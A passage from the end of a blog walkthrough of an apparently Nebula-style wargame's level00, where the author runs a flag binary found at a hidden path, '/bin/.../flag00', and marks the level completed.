<tr><td class="tr-caption" style="text-align: center;">"/bin/.../flag00" - intersting...</td></tr>
</tbody></table>
so we run:<br />
<blockquote class="tr_bq">
<span style="background-color: #666666;">/bin/.../flag00</span></blockquote>
...and that's it !<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8R9SOtcxz2JvyNMG0UjJKyVCQjZMHrizRmVYU-FlVTEs3xiZ-GheXH9gKL8WCVbCfxtBqenYTKIND4vBbKzFyf5MYv4SWB0LlEUyHDi78h975jIyNawtKoomrkKfhVvRRxMhf262fP8/s1600/done.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8R9SOtcxz2JvyNMG0UjJKyVCQjZMHrizRmVYU-FlVTEs3xiZ-GheXH9gKL8WCVbCfxtBqenYTKIND4vBbKzFyf5MYv4SWB0LlEUyHDi78h975jIyNawtKoomrkKfhVvRRxMhf262fP8/s320/done.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">level00 completed</td></tr>
</tbody></table>
Stay tuned for next episodes ;)Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0